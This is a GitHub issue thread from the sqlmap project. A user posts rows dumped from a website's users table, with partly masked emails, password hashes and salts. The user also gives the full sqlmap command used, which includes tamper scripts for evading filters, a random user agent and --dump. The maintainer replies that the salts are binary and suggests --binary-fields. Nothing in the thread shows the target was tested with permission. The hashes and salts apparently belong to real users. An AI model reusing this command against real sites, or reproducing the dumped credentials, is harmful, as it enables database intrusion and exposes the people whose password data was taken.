### ISSUE TITLE
--dump ERROR salt

### ISSUE THREAD

**Issue by VERUMLABS777** [sqlmapproject/sqlmap#4648]
-C email,password,salt

xxxxx@mail:22bf18ab83d17c8fd3f174504d45ede4:"o(`VS$D3:I:sT%XE)\\k:?q)Q7%O+LI"
xxx@live.fr:1c89eb99e511228b9ab497c283445852:9M!8L5=V:[O{)Z.+8v&r;3Y%Z&o{W:
xxxxx@gmail.com:48dd58c842027e9259e26fc03035f605:"M[dTmja<d:dp;cDf9KdTn#!AXU6U$&"
xxxxx@gmail.com:0b0583a72f11eb0d480777e752af1d56:"B:dOE:}KIZ|A^oox%uWa4TIiYP$Pl8"
xxxxxx@gmail.com:647055794c3624478a00e8393dda1aa8:"R$Se;\\:!u"")'TD2j_>D24tX=6@Ac~&"
xxxxxx@yahoo.com:c9087860bd58839cf783b5badb8178f2:{E;CtRp3'iHOA_L*17B3^}v@cs>UmF
xxxxx@yahoo.com:8a4ca0ebb5e5cd42fcf1418e2c000450:m{iOT^8R2}at'XWhSFO-^JP{;ZTOHQ
xxxxxx@gmail.com:f93a651f5000c75901ebd69d904da5b0:"k1@(""d8rwW)_\\>Q-uK%.A^-cL]o[|H"

I get these lines
This is incorrect salt (( Is it MD5!
Changed Unicode Windows for UTF-8! the same situation ((
What the hell ! Why is it so!? o0.

**Comment by VERUMLABS777** [comment]
sqlmap.py -r C:\Users\username\Desktop\TEST\site.com.txt -p param --level 3 --risk 3 --threads 9 --banner --tamper=between,space2comment --random-agent -o --drop-set-cookie --fresh-queries --no-cast --dbms=MySQL -D db -T users -C email,password,salt,id --dump --batch

**Comment by VERUMLABS777** [comment]
maybe I'm wrong !!! And this is actually a very cool salt!?

**Comment by stamparm** [comment]
`-C email,password,salt --binary-fields=salt` <- this should give you the salt in hexadecimal representation. Your salt looks ok. Only problem is that it is a binary one, so, you have to try to use the `--binary-fields`

**Comment by VERUMLABS777** [comment]
Stamparm Thank you !
